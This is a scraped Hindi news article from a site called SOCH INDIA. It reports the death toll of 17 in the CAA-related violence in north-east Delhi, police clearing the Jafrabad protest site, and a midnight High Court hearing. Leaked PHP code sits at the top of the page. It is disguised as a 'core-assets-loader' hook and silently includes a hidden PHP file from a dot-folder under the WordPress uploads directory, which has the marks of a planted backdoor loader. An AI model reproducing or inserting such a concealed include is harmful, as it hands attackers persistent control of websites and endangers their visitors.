add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); दिल्ली में बढ़ा मरने वालों का आंकड़ा, अबतक 17 की मौत – SOCH INDIA
Menu

दिल्ली में बढ़ा मरने वालों का आंकड़ा, अबतक 17 की मौत

नागरिकता संशोधन एक्ट (CAA) के नाम पर दिल्ली की सड़कों पर शुरू हुआ बवाल अभी तक थमा नहीं है. पिछले तीन दिनों में देश की राजधानी दिल्ली के कई इलाकों में हिंसा (Delhi Violence) हुई है, जिसमें अभी तक 17 लोगों की जान चली गई है. सोमवार और मंगलवार को उत्तर पूर्वी दिल्ली के मौजपुर-चांदबाग इलाके में हालात इतने बेकाबू हुए कि दिल्ली पुलिस को मार्च निकालना पड़ा. पुलिस ने इस बवाल के बीच जाफराबाद में जारी CAA विरोधी धरना स्थल को खाली करवा दिया है. दिल्ली में हुई हिंसा के मसले पर आधी रात को हाई कोर्ट में सुनवाई भी हुई.